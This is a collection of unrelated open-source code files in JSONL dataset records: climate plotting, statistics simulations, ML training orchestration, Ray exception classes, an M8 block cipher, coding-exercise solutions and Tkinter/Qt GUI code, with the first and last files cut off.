orientation=\"vertical\") \n fig.subplots_adjust(wspace=0.1,hspace=0, right=0.8)\n \nif args.output is not None:\n fname = args.output\nelse:\n fname = (args.bench_directory).split('/')[-2].split('.nc')[0]\n\ndirectory = f'./precipitation_{benchmarks}'\nif not os.path.exists(directory):\n os.makedirs(directory)\n\n# Save the figure \nfname1 = os.path.join(directory, f'{fname}_accprec.png')\nfname2 = os.path.join(directory, f'{fname}_acc_prec_bias.png')\nfig1.savefig(fname1, dpi=300)\nprint(\"Saved {}\".format(fname1))\nfig2.savefig(fname2, dpi=300)\nprint(\"Saved {}\".format(fname2))\n\n# =============================================================================\n# Plot IMERG acc prec\n# =============================================================================\nprint('\\nPlotting IMERG data..')\nplt.close('all')\nfig = plt.figure(figsize=(10, 10))\ndatacrs = ccrs.PlateCarree()\nax = fig.add_subplot(111, projection=datacrs,frameon=True)\nax.set_extent([-55, -30, -20, -35], crs=datacrs) \ngl = ax.gridlines(draw_labels=True,zorder=2,linestyle='dashed',\n alpha=0.8, color='#383838')\ngl.xlabel_style = {'size': 16, 'color': '#383838'}\ngl.ylabel_style = {'size': 16, 'color': '#383838'}\ngl.right_labels = None\ngl.top_labels = None\ncf = ax.contourf(imerg_accprec.lon, imerg_accprec.lat,\n imerg_accprec, cmap=cmo.rain,\n levels=prec_levels)\nfig.colorbar(cf, ax=ax, fraction=0.03, pad=0.1)\nax.coastlines(zorder = 1)\n\nimergname = args.imerg.split('/')[-1].split('.nc')[0]\nfname1 = os.path.join(directory, f'{imergname}_accprec.png')\nplt.savefig(fname1, dpi=300)\nprint(\"Saved {}\".format(fname1))\n","repo_name":"daniloceano/MPAS-A_Catarina_Physics-Test","sub_path":"figures_MPAS-worshop/precipitation.py","file_name":"precipitation.py","file_ext":"py","file_size_in_byte":10396,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"42668875126","text":"import numpy as np\nfrom samplingFunctions import *\nimport scipy.stats\n\nnum_iterations = 10\ntreatments = [\"control\",\"v1\",\"v2\",\"v3\",\"v4\",\"v5\"]\nsample_sizes = [30,100,500]\nmedians = range(1,8)\nh0_median = 4\n\nif __name__ == \"__main__\":\n\n with open(\"t-test-one-sided.csv\", \"w\") as f:\n f.write(\"id,treatment,sample_size,median,p_value,sd,lower,upper\\n\")\n id = 1\n data = None\n for median in medians:\n for sample_size in sample_sizes:\n for treatment in treatments:\n p_vals = []\n for i in range(num_iterations):\n if treatment == \"control\":\n data = sampleIndependentNormal(numSamples=sample_size, offset=median)\n if treatment == \"v1\":\n # v1: Errors from Independent Normal not centered at zero, still constant variance.\n data = sampleIndependentNormal(numSamples=sample_size, offset=median, error_mean=np.random.normal(size=1))\n if treatment == \"v2\":\n # v2: Errors from Independent Normal centered at zero, but non-constant variance.\n data = sampleIndependentNormalNonConstantVariance(numSamples=sample_size, offset=median)\n if treatment == \"v3\":\n # v3: Errors are independent but drawn from a logistic distribution.\n data = sampleIndependentContinuousSymmetric(numSamples=sample_size,offset=median)\n if treatment == \"v4\":\n # v4: Errors are dependent and drawn from a Normal distribution.\n data = generateDependentSamplesLatentNormal(numSamples=sample_size,offset=median)\n if treatment == \"v5\":\n # v5: Errors are independent and from Normal distribution, but data is discretized.\n data = sampleIndependentNormal(numSamples=sample_size,offset=median,discrete=True)\n test_result = scipy.stats.ttest_1samp(data,popmean=h0_median)\n t_stat = test_result[0]\n two_sided_p_val = test_result[1]\n one_sided_p_val = two_sided_p_val / 2\n p_val = one_sided_p_val if t_stat > 0 else 1 - one_sided_p_val\n p_vals.append(p_val)\n p_value = np.mean(p_vals)\n sd = np.std(p_vals)\n lower = np.percentile(p_vals,5)\n upper = np.percentile(p_vals,95)\n f.write(\"%d,%s,%d,%d,%.9f,%.9f,%.9f,%.9f\\n\" % (id,treatment,sample_size,median,p_value,sd,lower,upper))\n id += 1\n","repo_name":"lsouth/likert-project","sub_path":"t-test.py","file_name":"t-test.py","file_ext":"py","file_size_in_byte":2812,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"12492387715","text":"import logging\nimport sys\n\nimport gflags\nimport numpy as np\n\nFLAGS = gflags.FLAGS\n\ngflags.DEFINE_string('glove_pretrained_data', '/scratch/data/glove/glove.test.txt',\n 'location of the glove pretrained data file.')\n\n\nclass GloveEmbeddings:\n def __init__(self):\n self.embeddings = {}\n logging.info(\"Loading embeddings from file \" + FLAGS.glove_pretrained_data)\n logging.info(\"Will take upto several minutes...\")\n with open(FLAGS.glove_pretrained_data) as f:\n for line in f:\n split = line.split(' ')\n self.embeddings[split[0]] = np.array([float(i) for i in split[1:]])\n self.vocab_size = len(self.embeddings)\n self.embedding_dimension = self.embedding_size()\n logging.info(\"Done loading embedding from file.\")\n\n def get_embedding(self, word):\n if word in self.embeddings:\n return self.embeddings[word]\n else:\n return np.zeros(self.embedding_size())\n\n def embedding_size(self):\n return len(self.embeddings['a'])\n\n\nif __name__ == '__main__':\n gflags.DEFINE_boolean('verbose', True, 'turn on debug output, local only.')\n FLAGS(sys.argv)\n e = GloveEmbeddings()\n print(e.embeddings['hello'])\n print(e.embedding_dimension)\n print(e.vocab_size)\n","repo_name":"fredfung007/alert","sub_path":"model/tracking_by_natural_language_description/glove_embeddings.py","file_name":"glove_embeddings.py","file_ext":"py","file_size_in_byte":1316,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"10102212496","text":"# -*- coding: utf-8 -*-\n\"\"\"\nThis module defines the Prefect flow for orchestrating model training, using the\nfunctions and methods defined in src.models.train_model.\n\"\"\"\nimport os\nfrom typing import Any, Dict, List, Optional, Union\n\nimport mlflow\nfrom dotenv import find_dotenv, load_dotenv\nfrom mlflow.tracking import MlflowClient\nfrom prefect import flow, get_run_logger, task\nfrom prefect.task_runners import SequentialTaskRunner\n\nimport src.models.train_model as tm\n\nALL_SEARCH_PARAMS = tm.ALL_SEARCH_PARAMS\n\nload_dotenv(find_dotenv())\nFEATURE_STORE_URI = os.getenv(\"FEATURE_STORE_URI\", \"localhost:5432\")\nFEATURE_STORE_PW = os.getenv(\"FEATURE_STORE_PW\")\nDATABASE_URI = f\"postgresql+psycopg2://postgres:{FEATURE_STORE_PW}@{FEATURE_STORE_URI}\"\ntm.EXP_NAME = os.getenv(\"EXP_NAME\", \"exercise_prediction_naive_feats\")\nDEBUG = os.getenv(\"DEBUG\", \"false\") == \"true\"\nif DEBUG:\n tm.EXP_NAME = tm.EXP_NAME + \"_debug\"\n\ntm.DATABASE_URI = DATABASE_URI\ntm.MLFLOW_TRACKING_SERVER = os.getenv(\"MLFLOW_TRACKING_SERVER\", \"localhost:5000\")\ntm.FEATURIZE_ID = os.getenv(\"FEATURIZE_ID\")\n\nmlflow.set_tracking_uri(f\"http://{tm.MLFLOW_TRACKING_SERVER}\")\nmlflow.set_experiment(tm.EXP_NAME)\n\ntm.CLIENT = MlflowClient(f\"http://{tm.MLFLOW_TRACKING_SERVER}\")\ntm.EXP_ID = dict(mlflow.get_experiment_by_name(tm.EXP_NAME))[\"experiment_id\"]\n\nload_data = task(tm.load_data, name=\"Data Loading\") # type: ignore\nprocess_columns = task(tm.process_columns, name=\"Preprocessing\") # type: ignore\nmodel_search = task( # type: ignore\n tm.model_search, name=\"Model Hyperparameter Search with hyperopt\"\n)\ntrain_log_best_model = task( # type: ignore\n tm.train_log_best_model, name=\"Train and Log Best Model\"\n)\ntest_log_best_model = task( # type: ignore\n tm.test_log_best_model, name=\"Test and Log Best-Model Accuracy\"\n)\ncompare_with_registered_models = task( # type: ignore\n tm.compare_with_registered_models, name=\"Compare with Registered Models\"\n)\n\n\n@flow(\n name=\"Model Training\",\n task_runner=SequentialTaskRunner(),\n)\ndef train_flow(\n table_name: str = \"naive_frequency_features\",\n label_col: str = \"label_group\",\n model_search_json: str = \"./model_search.json\",\n initial_points_json: Optional[str] = None,\n) -> None:\n # pylint: disable=too-many-locals\n # pylint: disable=protected-access\n \"\"\"\n This function loads the data, performs a search over the hyperparameters using hyperopt,\n and then trains the best model on the training data and tests it on the test data.\n Finally, it compares the best model from this training to the existing model in\n production (if one exists) and registers and promotes the model to staging if either\n no production model exists or the new model has a better accuracy.\n\n Args:\n table_name (str): the name of the table in the database that contains the data\n label_col (str): the name of the column in the data that contains the labels\n model_search_json (str): This is the path to the JSON file that contains the model\n name, fixed parameters, and search parameters. Defaults to ./model_search.json\n initial_points_json (Optional[str]): This is the path to the JSON file that\n contains starting points for hyperparameter values for fitting procedure (e.g., to\n use values from previous fit to potentially speed up fitting). Defaults to None\n \"\"\"\n logger = get_run_logger()\n logger.info(\"loading metadata\")\n model_search_params = tm._read_json(model_search_json)\n data_limits = [\n model_search_params[\"train_limit\"],\n model_search_params[\"validation_limit\"],\n ]\n model_name = model_search_params[\"model\"]\n fixed_params = model_search_params[\"fixed_paramaters\"]\n search_params = model_search_params[\"search_parameters\"]\n fmin_rstate = model_search_params[\"fmin_rstate\"]\n\n initial_points: Optional[Union[List[Dict[Any, Any]], Dict[Any, Any]]] = None\n if initial_points_json:\n logger.info(\n \"loading hyperparameter starting points from %s...\", initial_points_json\n )\n initial_points = tm._read_json(initial_points_json)\n # if we have a dict of lists (i.e., multiple starting points), convert to list\n # of dicts\n if any(isinstance(val, list) for val in initial_points.values()):\n initial_points = [\n dict(zip(initial_points, t)) for t in zip(*initial_points.values())\n ]\n else:\n # assume otherwise it is a simply dict with 1 val per key\n initial_points = [initial_points]\n logger.info(\"trials will start with parameters %s\", initial_points)\n\n logger.info(\"loading training and validation data...\")\n df_train_meta, df_val_meta = (\n load_data(table_name, group, limit)\n for group, limit in zip([\"train\", \"validation\"], data_limits)\n )\n logger.info(\"loading complete\")\n\n logger.info(\"performing preprocessing...\")\n x_data = [process_columns(table_name, df) for df in (df_train_meta, df_val_meta)]\n y_data = [df_train_meta[label_col], df_val_meta[label_col]]\n logger.info(\"preprocessing complete\")\n\n logger.info(\"performing model search for %s classifier...\", model_name)\n search_space = {param: ALL_SEARCH_PARAMS[param] for param in search_params}\n best_params, parent_run_id = model_search(\n model_name,\n fixed_params,\n search_space,\n x_data,\n y_data,\n fmin_rstate,\n initial_points,\n )\n logger.info(\"model search complete...parent_run_id=%s\", parent_run_id)\n logger.info(\"best parameters: %s\", best_params)\n\n logger.info(\"logging best model in MLflow...\")\n # first elements in x_data and y_data are training...\n best_clf, best_child_id = train_log_best_model(\n parent_run_id, model_name, best_params, x_data[0], y_data[0]\n )\n logger.info(\"logging complete...best_child_id=%s\", best_child_id)\n\n logger.info(\"loading test data...\")\n # test best model with test data\n df_test_meta = load_data(table_name, \"test\", model_search_params[\"test_limit\"])\n logger.info(\"loading complete\")\n\n logger.info(\"performing preprocessing...\")\n X_test = process_columns(table_name, df_test_meta)\n y_test = df_test_meta[label_col]\n logger.info(\"preprocessing complete\")\n\n logger.info(\"testing best model on test dataset...\")\n best_acc = test_log_best_model(best_child_id, best_clf, X_test, y_test)\n logger.info(\"testing complete\")\n\n logger.info(\"comparing best model with existing registered models\")\n # compare test accuracy from best_child_id with accuracy from previous best\n # in best_run.json (if exists), update json if new accuracy better than previous\n _ = compare_with_registered_models(best_child_id, best_acc)\n logger.info(\"comparison complete\")\n logger.info(\"complete\")\n","repo_name":"adamgifford-behavr/exercise_prediction","sub_path":"src/orchestration/orchestrate_train.py","file_name":"orchestrate_train.py","file_ext":"py","file_size_in_byte":6805,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"12541964419","text":"\"\"\"\nGiven four lists A, B, C, D of integer values, compute how many tuples (i, j, k, l)\nthere are such that A[i] + B[j] + C[k] + D[l] is zero.\n\"\"\"\n\nclass Solution:\n def fourSumCount(self, A,B,C,D):\n d = {}\n answer = 0\n\n for num in A:\n for num2 in B:\n d[num + num2] = d.get(num + num2, 0) + 1\n for num in C:\n for num2 in D:\n answer += d.get(-(num + num2), 0)\n return answer\n\n\nA = [ 1, 2]\nB = [-2,-1]\nC = [-1, 2]\nD = [ 0, 2]\ns =Solution()\nprint(s.fourSumCount(A,B,C,D))","repo_name":"IamJayanthiReddy/leetcode","sub_path":"december_challenge/sum4.py","file_name":"sum4.py","file_ext":"py","file_size_in_byte":557,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"72811305708","text":"from typing import Type, Callable\n\n\ndef after_previous_gen():\n order_no = 1\n while True:\n yield order_no\n order_no += 1\n\n\ndef raises(e: Type[Exception], callable_: Callable):\n try:\n callable_()\n except e:\n return True\n else:\n return False\n\n\ndef is_sorted(lst):\n return all(lst[i] >= lst[i + 1] for i in range(len(lst) - 1))\n","repo_name":"exadel-inc/CompreFace","sub_path":"embedding-calculator/src/services/utils/pytestutils.py","file_name":"pytestutils.py","file_ext":"py","file_size_in_byte":377,"program_lang":"python","lang":"en","doc_type":"code","stars":3424,"dataset":"github-code","pt":"37"} +{"seq_id":"37409099141","text":"'''\nhttps://www.hackerrank.com/challenges/find-digits/submissions/code/102916653\n\nAn integer is a divisor of an integer if the remainder of .\n\nGiven an integer, for each digit that makes up the integer determine whether it is a divisor. Count the number of divisors occurring within the integer.\n\n'''\n#!/bin/python3\n\nimport math\nimport os\nimport random\nimport re\nimport sys\n\n# Complete the findDigits function below.\ndef findDigits(n):\n list1 = str(n)\n count = 0\n for i in list1:\n if int(i) !=0 and n % int(i) == 0 :\n count += 1\n return count \n\nif __name__ == '__main__':\n fptr = open(os.environ['OUTPUT_PATH'], 'w')\n\n t = int(input())\n\n for t_itr in range(t):\n n = int(input())\n\n result = findDigits(n)\n\n fptr.write(str(result) + '\\n')\n\n fptr.close()\n","repo_name":"leewalter/coding","sub_path":"python/hackerrank/find_digits_divisors.py","file_name":"find_digits_divisors.py","file_ext":"py","file_size_in_byte":826,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"6649514042","text":"from PySide6.QtWidgets import (\n QWidget, \n QDialog, \n QDialogButtonBox, \n QHBoxLayout, \n QLabel, \n QLineEdit,\n QVBoxLayout, \n QComboBox, \n QPushButton\n)\n\nfrom .helper import resizeLineEdit\n\nfrom PyReconstruct.modules.datatypes import Series\nfrom PyReconstruct.modules.gui.utils import notify\n\nclass CreateZarrDialog(QDialog):\n\n def __init__(self, parent : QWidget, series : Series):\n \"\"\"Create a zarr dialog.\n \n Params:\n parent (QWidget): the parent widget\n series (Series): the series\n \"\"\"\n self.series = series\n\n super().__init__(parent)\n\n self.setWindowTitle(\"Create Zarr\")\n\n vlayout = QVBoxLayout()\n vlayout.setSpacing(10)\n\n # get the border object\n bobj_row = QHBoxLayout()\n bobj_text = QLabel(self, text=\"Border object:\")\n self.bobj_input = QLineEdit(self)\n resizeLineEdit(self.bobj_input, \"X\"*15)\n bobj_row.addWidget(bobj_text)\n bobj_row.addWidget(self.bobj_input)\n vlayout.addLayout(bobj_row)\n\n # get the section range\n sections = sorted(list(series.sections.keys()))\n srange_row = QHBoxLayout()\n srnage_text1 = QLabel(self, text=\"From section\")\n self.srange_input1 = QLineEdit(self)\n self.srange_input1.setText(str(sections[0]))\n resizeLineEdit(self.srange_input1, \"0000\")\n srange_text2 = QLabel(self, text=\"to\")\n self.srange_input2 = QLineEdit(self)\n self.srange_input2.setText(str(sections[-1]))\n resizeLineEdit(self.srange_input2, \"0000\")\n srange_row.addWidget(srnage_text1)\n srange_row.addWidget(self.srange_input1)\n srange_row.addWidget(srange_text2)\n srange_row.addWidget(self.srange_input2)\n vlayout.addLayout(srange_row)\n\n # get the mangification\n mag_row = QHBoxLayout()\n mag_text = QLabel(self, text=\"Magnification (µm/pix):\")\n self.mag_input = QLineEdit(self)\n resizeLineEdit(self.mag_input, \"0\"*10)\n self.mag_input.setText(\n str(self.series.data[\"sections\"][self.series.current_section][\"mag\"])\n )\n mag_row.addWidget(mag_text)\n mag_row.addWidget(self.mag_input)\n vlayout.addLayout(mag_row)\n\n QBtn = QDialogButtonBox.Ok | QDialogButtonBox.Cancel\n buttonbox = QDialogButtonBox(QBtn)\n buttonbox.accepted.connect(self.accept)\n buttonbox.rejected.connect(self.reject)\n\n vlayout.addSpacing(10)\n vlayout.addWidget(buttonbox)\n\n self.setLayout(vlayout)\n \n def accept(self):\n \"\"\"Overwritten from QDialog.\"\"\" \n # check that border object is valid\n bobj = self.bobj_input.text()\n if bobj not in self.series.data[\"objects\"]:\n notify(\"Border object not in series.\")\n return\n \n # check for valid section numbers\n srange = (\n self.srange_input1.text(),\n self.srange_input2.text()\n )\n for s in srange:\n if not s.isnumeric() or int(s) not in self.series.sections:\n notify(\"Please enter a valid section number.\")\n return\n if int(srange[0]) >= int(srange[1]):\n notify(\"Please enter a valid section range.\")\n return\n \n # check for valid mag\n mag = self.mag_input.text()\n if not mag.replace(\".\", \"\", 1).isnumeric():\n notify(\"Please enter a valid magnification.\")\n return\n \n super().accept() \n\n def exec(self):\n \"\"\"Run the dialog.\"\"\"\n confirmed = super().exec()\n if confirmed:\n\n border_obj = self.bobj_input.text()\n\n srange = (\n int(self.srange_input1.text()),\n int(self.srange_input2.text()) + 1\n )\n\n mag = float(self.mag_input.text())\n\n return (border_obj, srange, mag), True\n \n else:\n return None, False\n","repo_name":"SynapseWeb/PyReconstruct","sub_path":"PyReconstruct/modules/gui/dialog/create_zarr.py","file_name":"create_zarr.py","file_ext":"py","file_size_in_byte":4029,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"37"} +{"seq_id":"35764314780","text":"import os\n\nimport colorama\n\nimport ray\nimport setproctitle\n\n\nclass RayError(Exception):\n \"\"\"Super class of all ray exception types.\"\"\"\n pass\n\n\nclass RayConnectionError(RayError):\n \"\"\"Raised when ray is not yet connected but needs to be.\"\"\"\n pass\n\n\nclass RayCancellationError(RayError):\n \"\"\"Raised when this task is cancelled.\n\n Attributes:\n task_id (TaskID): The TaskID of the function that was directly\n cancelled.\n \"\"\"\n\n def __init__(self, task_id=None):\n self.task_id = task_id\n\n def __str__(self):\n if self.task_id is None:\n return \"This task or its dependency was cancelled by\"\n return \"Task: \" + str(self.task_id) + \" was cancelled\"\n\n\nclass RayTaskError(RayError):\n \"\"\"Indicates that a task threw an exception during execution.\n\n If a task throws an exception during execution, a RayTaskError is stored in\n the object store for each of the task's outputs. When an object is\n retrieved from the object store, the Python method that retrieved it checks\n to see if the object is a RayTaskError and if it is then an exception is\n thrown propagating the error message.\n\n Attributes:\n function_name (str): The name of the function that failed and produced\n the RayTaskError.\n traceback_str (str): The traceback from the exception.\n \"\"\"\n\n def __init__(self,\n function_name,\n traceback_str,\n cause_cls,\n proctitle=None,\n pid=None,\n ip=None):\n \"\"\"Initialize a RayTaskError.\"\"\"\n if proctitle:\n self.proctitle = proctitle\n else:\n self.proctitle = setproctitle.getproctitle()\n self.pid = pid or os.getpid()\n self.ip = ip or ray.services.get_node_ip_address()\n self.function_name = function_name\n self.traceback_str = traceback_str\n self.cause_cls = cause_cls\n assert traceback_str is not None\n\n def as_instanceof_cause(self):\n \"\"\"Returns copy that is an instance of the cause's Python class.\n\n The returned exception will inherit from both RayTaskError and the\n cause class.\n \"\"\"\n\n if issubclass(RayTaskError, self.cause_cls):\n return self # already satisfied\n\n if issubclass(self.cause_cls, RayError):\n return self # don't try to wrap ray internal errors\n\n class cls(RayTaskError, self.cause_cls):\n def __init__(self, function_name, traceback_str, cause_cls,\n proctitle, pid, ip):\n RayTaskError.__init__(self, function_name, traceback_str,\n cause_cls, proctitle, pid, ip)\n\n name = \"RayTaskError({})\".format(self.cause_cls.__name__)\n cls.__name__ = name\n cls.__qualname__ = name\n\n return cls(self.function_name, self.traceback_str, self.cause_cls,\n self.proctitle, self.pid, self.ip)\n\n def __str__(self):\n \"\"\"Format a RayTaskError as a string.\"\"\"\n lines = self.traceback_str.strip().split(\"\\n\")\n out = []\n in_worker = False\n for line in lines:\n if line.startswith(\"Traceback \"):\n out.append(\"{}{}{} (pid={}, ip={})\".format(\n colorama.Fore.CYAN, self.proctitle, colorama.Fore.RESET,\n self.pid, self.ip))\n elif in_worker:\n in_worker = False\n elif \"ray/worker.py\" in line or \"ray/function_manager.py\" in line:\n in_worker = True\n else:\n out.append(line)\n return \"\\n\".join(out)\n\n\nclass RayWorkerError(RayError):\n \"\"\"Indicates that the worker died unexpectedly while executing a task.\"\"\"\n\n def __str__(self):\n return \"The worker died unexpectedly while executing this task.\"\n\n\nclass RayActorError(RayError):\n \"\"\"Indicates that the actor died unexpectedly before finishing a task.\n\n This exception could happen either because the actor process dies while\n executing a task, or because a task is submitted to a dead actor.\n \"\"\"\n\n def __str__(self):\n return \"The actor died unexpectedly before finishing this task.\"\n\n\nclass RayletError(RayError):\n \"\"\"Indicates that the Raylet client has errored.\n\n This exception can be thrown when the raylet is killed.\n \"\"\"\n\n def __init__(self, client_exc):\n self.client_exc = client_exc\n\n def __str__(self):\n return \"The Raylet died with this message: {}\".format(self.client_exc)\n\n\nclass ObjectStoreFullError(RayError):\n \"\"\"Indicates that the object store is full.\n\n This is raised if the attempt to store the object fails\n because the object store is full even after multiple retries.\n \"\"\"\n\n def __str__(self):\n return super(ObjectStoreFullError, self).__str__() + (\n \"\\n\"\n \"The local object store is full of objects that are still in scope\"\n \" and cannot be evicted. Try increasing the object store memory \"\n \"available with ray.init(object_store_memory=). \"\n \"You can also try setting an option to fallback to LRU eviction \"\n \"when the object store is full by calling \"\n \"ray.init(lru_evict=True). See also: \"\n \"https://docs.ray.io/en/latest/memory-management.html.\")\n\n\nclass UnreconstructableError(RayError):\n \"\"\"Indicates that an object is lost and cannot be reconstructed.\n\n Note, this exception only happens for actor objects. If actor's current\n state is after object's creating task, the actor cannot re-run the task to\n reconstruct the object.\n\n Attributes:\n object_id: ID of the object.\n \"\"\"\n\n def __init__(self, object_id):\n self.object_id = object_id\n\n def __str__(self):\n return (\n \"Object {} is lost (either LRU evicted or deleted by user) and \"\n \"cannot be reconstructed. Try increasing the object store \"\n \"memory available with ray.init(object_store_memory=) \"\n \"or setting object store limits with \"\n \"ray.remote(object_store_memory=). See also: {}\".format(\n self.object_id.hex(),\n \"https://docs.ray.io/en/latest/memory-management.html\"))\n\n\nclass RayTimeoutError(RayError):\n \"\"\"Indicates that a call to the worker timed out.\"\"\"\n pass\n\n\nclass PlasmaObjectNotAvailable(RayError):\n \"\"\"Called when an object was not available within the given timeout.\"\"\"\n pass\n\n\nRAY_EXCEPTION_TYPES = [\n PlasmaObjectNotAvailable,\n RayError,\n RayTaskError,\n RayWorkerError,\n RayActorError,\n ObjectStoreFullError,\n UnreconstructableError,\n RayTimeoutError,\n]\n","repo_name":"HuantWang/SUPERSONIC","sub_path":"third_party/ray/exceptions.py","file_name":"exceptions.py","file_ext":"py","file_size_in_byte":6745,"program_lang":"python","lang":"en","doc_type":"code","stars":119,"dataset":"github-code","pt":"37"} +{"seq_id":"3180643370","text":"from math import inf\r\n\r\nl = []\r\n\r\nme = inf\r\nma = -inf\r\n\r\nfor c in range(0,5):\r\n n = int(input(f\"Digite um valor para a posição {c}: \"))\r\n l.append(n)\r\n if ma <= n:\r\n ma = n\r\n\r\n if me >= n:\r\n me = n\r\n\r\nprint(\"-=\"*14)\r\n\r\nprint(f\"Você digitou os valores: {l}\")\r\nprint(f\"O maior valor digitado foi {ma} nas posições \", end='')\r\nfor c in range(0,5):\r\n if l[c] == ma:\r\n print(f\"{c}... \",end='')\r\nprint()\r\nprint(f\"O menor valor digitado foi {me} nas posições \", end='')\r\nfor c in range(0,5):\r\n if l[c] == me:\r\n print(f\"{c}... \",end='')\r\nprint()","repo_name":"ChrisArthLisboa/projects","sub_path":"Python/m3/a17/ex78.py","file_name":"ex78.py","file_ext":"py","file_size_in_byte":590,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"1395207044","text":"M = 0xffffffff\n\n\ndef add(x, y):\n return (x + y) & M\n\n\ndef xor(x, y):\n return x ^ y\n\n\ndef rol(x, s):\n return ((x << s) | (x >> (32 - s))) & M\n\n\ndef m8_round(L, R, ri, k, adk, aek):\n \"\"\"\n One round of the algorithm.\n\n L, R: input\n ri: round index\n k: 256-bit execution key\n adk: 24-bit algorithm decision key\n aek: 96-bit algorithm expansion key\n \"\"\"\n\n op = [[add, xor][(adk >> (23 - i)) & 1] for i in range(9)]\n S1 = (adk >> 10) & 0x1f\n S2 = (adk >> 5) & 0x1f\n S3 = (adk >> 0) & 0x1f\n A = (aek >> 64) & M\n B = (aek >> 32) & M\n C = (aek >> 0) & M\n KR = (k >> (32 + 64 * (3 - ri % 4))) & M\n KL = (k >> (0 + 64 * (3 - ri % 4))) & M\n\n x = op[0](L, KL)\n y = op[2](op[1](rol(x, S1), x), A)\n z = op[5](op[4](op[3](rol(y, S2), y), B), KR)\n return op[8](op[7](op[6](rol(z, S3), z), C), R), L\n\n\ndef m8_keyexpand(dk, kek, adks, aeks):\n \"\"\"\n Key expansion.\n\n dk: 64-bit data key\n kek: 256-bit key expansion key\n adks: algorithm decision keys\n aeks: algorithm expansion keys\n \"\"\"\n\n L = (dk >> 32) & M\n R = (dk >> 0) & M\n k = 0\n for i in range(8):\n L, R = m8_round(L, R, i, kek, adks[i], aeks[i])\n k |= (L << (32 * (7 - i)))\n return k\n\n\ndef m8_encrypt(data, N, dk, kek, adks, aeks):\n \"\"\"\n Encrypt one block with M8.\n\n data: 64-bit input block\n N: number of rounds (must be >= 8)\n dk: 64-bit data key\n kek: 256-bit key expansion key\n adks: a list of N 24-bit algorithm decision keys\n aeks: a list of N 96-bit algorithm expansion keys\n \"\"\"\n\n ek = m8_keyexpand(dk, kek, adks, aeks)\n L = (data >> 32) & M\n R = (data >> 0) & M\n for i in range(N):\n L, R = m8_round(L, R, i, ek, adks[i], aeks[i])\n return (L << 32) | R\n","repo_name":"Euclidophren/fingercipher","sub_path":"encryption/block/m/m8.py","file_name":"m8.py","file_ext":"py","file_size_in_byte":1768,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"26578177445","text":"from tkinter import filedialog\r\nfrom tkinter import * \r\nfrom tkinter.ttk import *\r\nimport tkinter.messagebox\r\nimport matplotlib.pyplot as plt\r\nimport os\r\nimport matplotlib\r\nimport loading\r\n\r\n\r\nclass PARAM:\r\n\r\n \r\n def __init__(self, master):\r\n \r\n \r\n \r\n self.my_var = IntVar()\r\n self.valuesdata6 = StringVar()\r\n self.valuesdata3 = StringVar()\r\n self.valuesdata4 = StringVar()\r\n self.valuesdata5 = StringVar()\r\n self.file = open('temp.txt','w') \r\n \r\n ttk.Style().configure('green/black.TLabel', foreground='#000040', background='#8080ff')\r\n ttk.Style().configure('gb.TLabel', foreground='#000040', background='#dbdbdb')\r\n ttk.Style().configure('green/black.TButton', foreground='#000040', background='black')\r\n \r\n self.master = master\r\n self.master.title(\" MACHINE LEARNING BASED CLASSIFICATION TOOL \")\r\n self.master.config(bg=\"#dbdbdb\")\r\n self.master.geometry(\"800x680\")\r\n self.can = Canvas(master, width=800, height=100, bg='#8080ff')\r\n \r\n self.can.place(x=1, y=1)\r\n\r\n self.l = ttk.Label(master, text=\"MACHINE LEARNING BASED CLASSIFICATION TOOL \",\r\n font=('times new roman', 15, 'bold italic'),style='green/black.TLabel')\r\n self.l.place(x=175, y=30)\r\n \r\n \r\n \r\n self.e3 = ttk.Label(master,text=\"Select The Algorithm\",style=\"gb.TLabel\")\r\n self.e3.place(x=350, y=130, width=880)\r\n \r\n self.rb1 = ttk.Radiobutton(master, text='Artificial Neural Network', variable=self.my_var, value=5, command=self.selected)\r\n self.rb1.place(x=200, y=180)\r\n self.rb2 = ttk.Radiobutton(master, text='Convolutional Neural Network', variable=self.my_var, value=10, command=self.selected)\r\n self.rb2.place(x=420, y=180)\r\n \r\n \r\n self.e5 = ttk.Label(master,textvariable=self.valuesdata6,style='gb.TLabel')\r\n self.e5.place(x=235, y=255, width=350)\r\n \r\n self.e6 = ttk.Label(master,textvariable=self.valuesdata3,style='gb.TLabel')\r\n self.e6.place(x=235, y=335, width=350)\r\n \r\n self.e7 = ttk.Label(master,textvariable=self.valuesdata4,style='gb.TLabel')\r\n self.e7.place(x=235, y=385, width=350)\r\n \r\n self.e8 = ttk.Label(master,textvariable=self.valuesdata5,style='gb.TLabel')\r\n self.e8.place(x=235, y=435, width=350)\r\n \r\n \r\n \r\n self.x1 =Entry(master)\r\n self.x1.place(x=485, y=335, width=80)\r\n \r\n \r\n \r\n self.x2 =Entry(master)\r\n self.x2.place(x=485, y=385, width=80)\r\n \r\n \r\n self.x3 =Entry(master)\r\n self.x3.place(x=485, y=435, width=80)\r\n \r\n self.b5 = ttk.Button(master, text='Load Data', cursor=\"plus\", style='green/black.TButton', command=self.loadwindow)\r\n self.b5.place(x=50, y=580, width=110)\r\n \r\n \r\n \r\n self.x =Entry(master,style='gb.TLabel' )\r\n self.x.place(x=485, y=335, width=80,height=100)\r\n self.x.lift()\r\n \r\n self.xx =Entry(master,style='gb.TLabel')\r\n self.xx.place(x=485, y=435, width=80,height=50)\r\n self.xx.lift()\r\n \r\n \r\n def selected(self):\r\n if self.my_var.get()==5:\r\n self.valuesdata6.set(\"Define Parameters For Artificial Neural Network Classifier\")\r\n self.valuesdata3.set(\"Enter Number Of Training Cycles\")\r\n self.valuesdata4.set(\"Enter Number Of Training Classes\")\r\n self.valuesdata5.set(\"Enter Number Of Hidden Neurons\")\r\n self.x.lower()\r\n self.xx.lower()\r\n self.x1.delete(0,END)\r\n self.x2.delete(0,END)\r\n self.x3.delete(0,END)\r\n \r\n \r\n 